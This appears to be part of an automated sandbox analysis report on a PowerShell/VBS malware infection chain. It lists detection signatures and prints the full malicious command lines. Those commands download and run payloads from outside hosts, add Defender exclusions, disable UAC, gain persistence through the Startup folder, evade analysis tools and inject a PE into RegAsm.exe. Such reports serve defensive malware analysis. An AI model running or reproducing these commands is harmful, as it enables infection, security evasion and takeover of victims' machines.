Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: wscript.exe, 00000003.00000002.1722879370.000002022F767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: svchost.exe, 00000014.00000002.3427718356.000001A5D4A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3429490963.000001A5DA05A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000020.00000002.2019691898.000001795345D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HGfSy
Source: powershell.exe, 00000029.00000002.2817873067.00000200443E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: powershell.exe, 0000001C.00000002.1990380240.000002287E780000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA4&
Source: powershell.exe, 0000001C.00000002.2039057190.000002287F716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: powershell.exe, 00000002.00000002.1740974865.00000164F1278000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3420003995.000001DCBF4B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2080.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 28.2.powershell.exe.2287f090000.2.raw.unpack, Class2.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 4 + 4, ref buffer, 4, ref bytesRead)
Source: 28.2.powershell.exe.2287f090000.2.raw.unpack, Class2.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num6, length, 12288, 64)
Source: 28.2.powershell.exe.2287f090000.2.raw.unpack, Class2.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, XLogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded Q1\|~z4Vt 7eM*i
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded Q1\|~z4Vt 7eM*i			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BAC008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D49008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1185008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 3D7008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD5008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
